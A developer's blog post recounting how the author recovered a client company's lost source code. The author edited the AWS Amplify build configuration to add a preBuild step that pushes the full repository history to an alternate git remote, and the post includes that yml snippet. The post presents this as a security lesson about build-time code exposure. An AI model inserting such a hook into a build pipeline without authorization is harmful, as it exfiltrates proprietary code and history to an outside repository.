The day I recovered the company's source code
I wrote this article for the Revelo community. You can access it in portuguese here. English version is below.
TLDR
This article details the experience of recovering lost source code from a company that was connected to AWS Amplify. By changing the amplify.yml file, it was possible to push the source code to a Git repository during the build process. We will explore how Amplify works, focusing on security aspects and detailing how the source code is exposed at build time.
As developers, we go through some hassles on a daily basis: a company contacted me to do some freelance "small tweaks" service, but they didn't have access to the source code developed by the previous developer 😅. So, would you take on the project? Tell them to start from scratch? Try to recover the source code?
Scenario
The source code was hosted on GitHub and hosted on AWS through Amplify. We didn't have access to the repository, but we had access to the AWS dashboard.
Theory
At some point the code leaves GitHub and goes to AWS to be built and hosted. So we can have access, there is light at the end of the tunnel!
What is AWS Amplify?
AWS Amplify is a set of tools and services that allow developers to build scalable and secure applications in the cloud. It provides an easy-to-use interface to manage backend and frontend resources, including authentication, APIs, storage, and hosting.
You can start using Amplify by setting up a repository for your source code.
Notice that you need to authorize AWS Amplify to read your code and write the amplify.yml file which will control the build and deploy process in Amplify and can be customized to meet specific project needs.
Source Code Recovery
As we have seen, the source code is exposed to AWS Amplify so that the build process can be done. In other words, don't go connecting your repository anywhere and any account. In this case, the previous developer who was providing service believed his code was inaccessible. However, we know this is not true.
The build settings are in a yml file and can be modified by the AWS dashboard or by the repository itself, as we can see in the following image:
As I didn't have access to the repository, I modified this file through the AWS dashboard that the company had access to, and included a step before the build that sent all code to an empty git repository, thus maintaining the entire history of code changes.
version: 1
frontend:
phases:
preBuild:
commands:
- echo 'Enviando código fonte para o repositório Git alternativo'
- git remote add alternate-repo <URL_DO_REPOSITÓRIO_ALTERNATIVO>
- git push alternate-repo masterWith this we found out that the developer was outsourcing the service to someone else 🤡.
Note: If outsourcing was authorized in the contract, everything is fine. The guy went silent when he found out we were able to access the source code. But that's it folks, pay attention to the possibilities, understand how the tools work and their concepts so you can use them in the best way and get out of hassles like this, always ethically.
